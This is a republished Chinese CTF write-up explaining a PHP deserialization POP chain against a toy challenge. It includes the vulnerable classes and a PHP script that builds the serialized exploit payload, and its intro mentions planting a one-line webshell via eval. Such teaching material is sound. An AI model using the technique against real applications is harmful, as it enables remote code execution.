PHP反序列化漏洞之pop链2

news2024/12/26 3:01:00

目录

题目:

题目代码:

分析:代码审计

通过以上分析,最终我们构建这个payload:

结果:

 目标达到!


题目:

 这个题目分析就有难度了,需要掌握php的魔法方法的使用以及调用条件。

初识PHP反序列化_奋斗的小智的博客-CSDN博客但是如果想注入恶意payload,还需要对$test的值进行覆盖,题目中已经给出了序列化链,很明显是对类A的$test变量进行覆盖,将POST接收的phpin佛()值覆盖所定义的值,这里也可以传入一句话木马等,利用我们的eval危险函数(任意命令执行)进行执行。在执行unserialize()方法时会触发__wakeup()方法执行,将传入的字符串反序列化后,会替换掉test类里面$test变量的值,将php探针写入flag.php文件中,并通过下面的require引用,导致命令执行。https://blog.csdn.net/weixin_60719780/article/details/128795216?spm=1001.2014.3001.5501php反序列化漏洞之pop链_奋斗的小智的博客-CSDN博客常用于上层语言构造特定调用链的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用链,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与https://blog.csdn.net/weixin_60719780/article/details/128943473?spm=1001.2014.3001.5501

题目代码:

<?php
class start_gg
{
    public $mod1;
    public $mod2;
    public function __destruct()
    {
        $this->mod1->test1();
    }
}
class Call
{
    public $mod1;
    public $mod2;
    public function test1()
    {
        $this->mod1->test2();
    }
}
class funct
{
    public $mod1;
    public $mod2;
    public function __call($test2,$arr)
    {
        $s1 = $this->mod1;
        $s1();
    }
}
class func
{
    public $mod1;
    public $mod2;
    public function __invoke()
    {
        $this->mod2 = "字符串拼接".$this->mod1;
    } 
}
class string1
{
    public $str1;
    public $str2;
    public function __toString()
    {
        $this->str1->get_flag();
        return "1";
    }
}
class GetFlag
{
    public function get_flag()
    {
        echo "flag:xxxxxxxxxxxx";
    }
}
$a = $_GET['string'];
unserialize($a);
?>

分析:代码审计

首先查看php的魔术方法,该题目涉及了(__destruct()、__call($test2,$arr)、__invoke()、__toString()),我们的目的是要拿到flag。

第一步;要拿到flag,首先我们要进入get_flag函数里,而且还在GetFlag的类中,我们要进入这个类中;在__toString方法中,有这样一段代码:$this->str1->get_flag(); 我们可以把str1设为GetFlag,并且string1要为字符串,这是__tostring方法的条件。

即:$this->str1 = new GetFlag()

第二步:发现类func中存在__invoke方法执行了字符串拼接,所以我们需要把func当成函数使用自动调用__invoke,所以mod1的值为string1

即:$this->mod1 = new string1()   这样的话在字符串拼接的时候就会触发魔术方法__toString()

第三步:在funct中找到了函数调用,需要把mod1赋值为func类的对象,又因为函数调用在__call方法中,且参数为$test2,即无法调用test2方法时自动调用 __call方法;

即:$this->mod1 = new func()   将func类作为函数调用就会触发魔术方法__invoke()

第四步:在Call中的test1方法中存在$this->mod1->test2();,需要把$mod1赋值为funct的对象,让__call自动调用。

即:$this->mod1 = new funct()   因为$test2()方法不存在,当$this->mod1调用的时候会触发魔术方法__call()

第五步:查找test1方法的调用点,在start_gg中发现$this->mod1->test1();,把$mod1赋值为Call类的对象,等待__destruct()自动调用。这个程序的起点就在这里

即:$this->mod1 = new Call()

通过以上分析,最终我们构建这个payload:

<?php
class start_gg
{
    public $mod1;
    public $mod2;
    public function __construct()
    {
        $this->mod1 = new Call();
        //把$mod1赋值为Call类对象
    }
    public function __destruct()
    {
        $this->mod1->test1();
    }
}
class Call
{
    public $mod1;
    public $mod2;
    public function __construct()
    {
        $this->mod1 = new funct();
        //把 $mod1赋值为funct类对象
    }
    public function test1()
    {
        $this->mod1->test2();
    }
}

class funct
{
    public $mod1;
    public $mod2;
    public function __construct()
    {
        $this->mod1= new func();
        //把 $mod1赋值为func类对象

    }
    public function __call($test2,$arr)
    {
        $s1 = $this->mod1;
        $s1();
    }
}
class func
{
    public $mod1;
    public $mod2;
    public function __construct()
    {
        $this->mod1= new string1();
        //把 $mod1赋值为string1类对象

    }
    public function __invoke()
    {
        $this->mod2 = "字符串拼接".$this->mod1;
    }
}
class string1
{
    public $str1;
    public function __construct()
    {
        $this->str1= new GetFlag();
        //把 $str1赋值为GetFlag类对象
    }
    public function __toString()
    {
        $this->str1->get_flag();
        return "1";
    }
}
class GetFlag
{
    public function get_flag()
    {
        echo "flag:"."xxxxxxxxxxxx";
    }
}
$b = new start_gg;
//构造start_gg类对象$b
echo urlencode(serialize($b));
//显示输出url编码后的序列化对象

结果:

我们先执行下payload.php

 拿到结果后,我们构建url

 目标达到!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/334013.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

算法刷题打卡第85天:设计一个验证系统

设计一个验证系统 难度&#xff1a;中等 你需要设计一个包含验证码的验证系统。每一次验证中&#xff0c;用户会收到一个新的验证码&#xff0c;这个验证码在 currentTime 时刻之后 timeToLive 秒过期。如果验证码被更新了&#xff0c;那么它会在 currentTime &#xff08;可…

你评论,我赠书~【哈士奇赠书 - 13期】-〖Python程序设计-编程基础、Web开发及数据分析〗参与评论,即可有机获得

大家好&#xff0c;我是 哈士奇 &#xff0c;一位工作了十年的"技术混子"&#xff0c; 致力于为开发者赋能的UP主, 目前正在运营着 TFS_CLUB社区。 &#x1f4ac; 人生格言&#xff1a;优于别人,并不高贵,真正的高贵应该是优于过去的自己。&#x1f4ac; &#x1f4e…

100 行 shell 写个 Docker

作者&#xff1a;vivo 互联网运维团队- Hou Dengfeng 本文主要介绍使用shell实现一个简易的Docker。 一、目的 在初接触Docker的时候&#xff0c;我们必须要了解的几个概念就是Cgroup、Namespace、RootFs&#xff0c;如果本身对虚拟化的发展没有深入的了解&#xff0c;那么很…

java全栈知识点[面试篇](一)

jjava全栈知识点[面试篇]&#xff08;一&#xff09;阻塞与等待的状态转变⭐Synchronized本质上是通过什么保证线程安全的?volatile、synchronized和Lock如何保证可见性⭐Synchronized使得同时只有一个线程可以执行&#xff0c;性能比较差&#xff0c;有什么提升的方法?⭐syn…

Unity 进阶 之 AR/VR 3D空间场景中Laser镭射线拖拽UI实现问题的简单整理

Unity 进阶 之 AR/VR 3D场景中Laser镭射线拖拽UI实现问题的简单整理 目录 Unity 进阶 之 AR/VR 3D场景中Laser镭射线拖拽UI实现问题的简单整理 一、简单介绍 二、实现原理 三、注意事项 四、效果预览 五、简单实现步骤 常规拖拽 常规拖拽在3D空间拖拽位置跳动问题 解决…

C++003-C++变量和数据类型2

文章目录C003-C变量和数据类型2C数据类型数据类型及定义数据类型及类型大小浮点数据的使用**题目描述**&#xff1a;求阴影面积**题目描述**&#xff1a;计算园的周长和面积如何取消科学计数法表示浮点数iomanip的作用比较多:布尔变量的使用隐式转换与显式转换**题目描述**&…

JAVA环境变量配置步骤及测试(JDK的下载 安装 环境配置教程)

一&#xff1a;JDK的下载、安装和配置1、输入下载地址&#xff1a;https://www.oracle.com/downloads/往下滑&#xff0c;看到Developer Downloads &#xff0c;点击 java点击 Java (JDK) for Developers选择你想要下载的jdk版本4、 点击 JDK Downloads &#xff0c;往下拉&…

树莓派系统创建指南

无意中发现一个落灰的树莓派 故事便开始了…… 准备工作 树莓派 3B一张大于 8G 的 micro SD 卡一个读卡器HDMI 显示器及连接线、键盘、鼠标等外围设备 系统镜像下载 推荐两个树莓派镜像下载网站 树莓派官方网站&#xff1a;https://www.raspberrypi.com/software/树莓派实…

python+request+pytest+pytest-html集成的API自动化测试框架

对于框架任何问题&#xff0c;欢迎联系我&#xff01; 需要框架源码的&#xff0c;请私聊我&#xff01; 一、框架架构 二、项目目录结构 ├────.gitignore ├────case_utils/ 测试用例相关的工具类&#xff0c;包括HTTP请求封装及用例数据处理&#xff0c;用例文件生…

常用的辅助类2(StringBuilder、StringBuffer、处理时间相关的类、对象比较器)

Java知识点总结&#xff1a;想看的可以从这里进入 目录7.7、字符串相关类7.8、时间处理7.8.1、JDK8前7.8.2、JDK8后1、时间日期类2、格式化日期3、其他7.9、对象比较器7.7、字符串相关类 String&#xff1a;JDK1.0出现&#xff0c;字符串类&#xff0c;被final修饰其值不可改。…

30个HTML+CSS前端开发案例(三)

30个HTMLCSS前端开发案例&#xff08;11-15&#xff09;小米上称右侧悬浮菜单实现代码效果图自动轮播图效果实现代码效果图小米商城二级下拉菜单效果实现代码效果图时间轴效果实现代码效果图QQ音乐排行榜效果实现代码效果图资源包获取小米上称右侧悬浮菜单 实现代码 <!DOC…

idea中使用Git

目录 一、在idea中配置Git 1、打开settings&#xff0c;搜索git&#xff0c;找到本地上的git安装目录&#xff0c;选择git.exe 2、本地git安装目录 二、获取Git 1、本地初始化仓库 2、选中项目这层目录&#xff0c;点击确定 2、从远程仓库克隆 三、本地仓库操作 1、将文…

阶段二4_常用API之StringBuilder

一. StringBuilder类概述 概述 : StringBuilder 是一个可变的字符串类&#xff0c;我们可以把它看成是一个容器&#xff0c;这里的可变指的是 StringBuilder 对象中的内容是可变的。 作用&#xff1a; 提高供字符串的操作效率 案例&#xff1a; /**证明StringBuilder提高供字…

api接口详解大全(看这篇就足以了)

api接口详解大全?优秀的设计是产品变得卓越的原因设计API意味着提供有效的接口&#xff0c;可以帮助API使用者更好地了解、使用和集成&#xff0c;同时帮助人们有效地维护它每个产品都需要使用手册&#xff0c;API也不例外在API领域&#xff0c;可以将设计视为服务器和客户端之…

函数/任意波形发生器 DG5072 技术资料

函数/任意波形发生器 DG5072 DG5000人性化的界面设计和键盘布局&#xff0c;给用户带来非凡体验&#xff1b;丰富的标准配置接口&#xff0c;可轻松实现仪器远程控制&#xff0c;为用户提供更多解决方案。 产品特性 4.3英寸16M真彩TFT液晶显示屏 350 MHz、250MHz、100 MHz或70…

Pacemaker详解、pcs命令详解和参数说明、centos8或bclinux8.2离线安装pcs以及搭建pcs、pcs的使用说明

文章目录Pacemaker详解一、前言二、 Pacemaker概述1、Pacemaker介绍2、pacemaker的服务模式。3、Pacemaker的架构4、Pacemake内部组件三、Pacemaker集群管理工具pcspcs说明最为常用的管理命令四、Pacemaker集群资源管理1、集群资源代理常用的命令方法2、集群资源约束3、集群资源…

国家政策鼓励使用电子保函和银行函证,君子签助推函证数字化建设

近日&#xff0c;国家发改委发文&#xff0c;推动电子保函应用&#xff0c;降低电子保函费用&#xff1b;财政部会同银保监会发文&#xff0c;开展数字化函证&#xff0c;有效提升函证效率和效果。政策的出台有助于加快推进普及电子函证应用。 发改委&#xff1a;鼓励使用电子…

PMP考试前两个月开始备考时间足够吗?

简单不代表报名费便宜&#xff0c;但报名费贵是肯定会难的&#xff0c;不然从何而来的含金量一说&#xff1f;花钱就能买到的话估计现在全中国持有pmp的一抓一大把。 时间完全足够的。 相信很多朋友都了解过&#xff0c;pmp的备考时间基本上是在2~3个月&#xff0c;2个月最为…

shell的变量和引用

文章目录二、变量和引用2.1 什么是变量2.2变量的命名2.3 变量的类型2.3.1 根据数据类型分类2.3.2 根据作用域分类2.4 变量的定义2.5 shell中的引用2.6 变量的运算练习&#xff1a;二、变量和引用 在程序设计语言中&#xff0c;变量是一个非常重要的概念。也是初学者在进行Shel…

计讯物联智慧灯杆网关数字赋能智慧公园,点亮城市新未来

方案背景 …… 公园作为城市景观与生态要素的空间载体&#xff0c;是市民远离尘嚣、缓解压力的理想休闲地。随着人们生活水平的提高&#xff0c;公园的信息化与智能化成为公园建设的必然方向。计讯物联依托于物联网技术&#xff0c;以绿色发展理念为指导&#xff0c;充分考虑…